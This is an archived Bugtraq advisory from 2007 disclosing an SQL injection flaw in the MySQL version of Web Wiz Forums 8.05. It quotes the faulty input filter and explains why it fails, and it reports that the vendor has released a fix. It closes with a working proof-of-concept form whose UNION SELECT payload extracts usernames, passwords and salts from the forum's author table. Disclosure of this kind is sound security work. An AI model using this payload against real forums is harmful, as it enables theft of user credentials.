lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 20 Mar 2007 14:53:16 +0100
From: "Ivan Fratric" <ifsecure@...il.com>
To: bugtraq@...urityfocus.com
Subject: Web Wiz Forums 8.05 (MySQL version) SQL Injection

There is a vulnerability in MySQL version of Web Wiz Forums, free ASP
bulletin board system software, enabling SQL injection. The
vulnerability is in the code used to filter string parameters prior to
including them in the SQL queries:

'Format SQL Query funtion
Private Function formatSQLInput(ByVal strInputEntry)
'Remove malisous charcters from sql
strInputEntry = Replace(strInputEntry, "\'", "&#092;'", 1, -1, 1)
strInputEntry = Replace(strInputEntry, """", "", 1, -1, 1)
strInputEntry = Replace(strInputEntry, "'", "''", 1, -1, 1)
strInputEntry = Replace(strInputEntry, "[", "&#091;", 1, -1, 1)
strInputEntry = Replace(strInputEntry, "]", "&#093;", 1, -1, 1)
strInputEntry = Replace(strInputEntry, "<", "&lt;", 1, -1, 1)
strInputEntry = Replace(strInputEntry, ">", "&gt;", 1, -1, 1)
'Return
formatSQLInput = strInputEntry
End Function

Assume the user enters a string containing the following sequence of
characters: \"' (a backslash, followed by a double quote followed by a
single quote). The first line inside the function above would do
nothing, the second line would remove the double quote, and after the
third line the sequence would look like \'' (a backslash followed by
two single quotes). In MySQL the first two characters would be
interpreted as an escaped single quote and the third character would
terminate the quotes thus allowing injection of arbitrary SQL code
placed after it.

Only the MySQL version of the Web Wiz Forums is vulnerable to this as
SQL Server and MS Access don't use backslash as an escape character.

Below I include a small exploit that demonstrates this vulnerability.

Mar 19th 2007: Vulnerability discovered
Mar 20th 2007: Vendor contacted
Mar 20th 2007: Vendor responded
Mar 20th 2007: Vendor released fixed version (8.05a)

Discovered and reported by Ivan Fratric
http://ifsec.blogspot.com/


<form method="post" action="http://localhost/forum/pop_up_member_search.asp?">
<input type="hidden" name="name" id="name" value="\&quot;&#039; union
select concat(userusernamename,char(58),passpasswordword,char(58),sasaltlt)
from tblautauthorhor /*" >
<input type="submit" value="Go">
</form>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ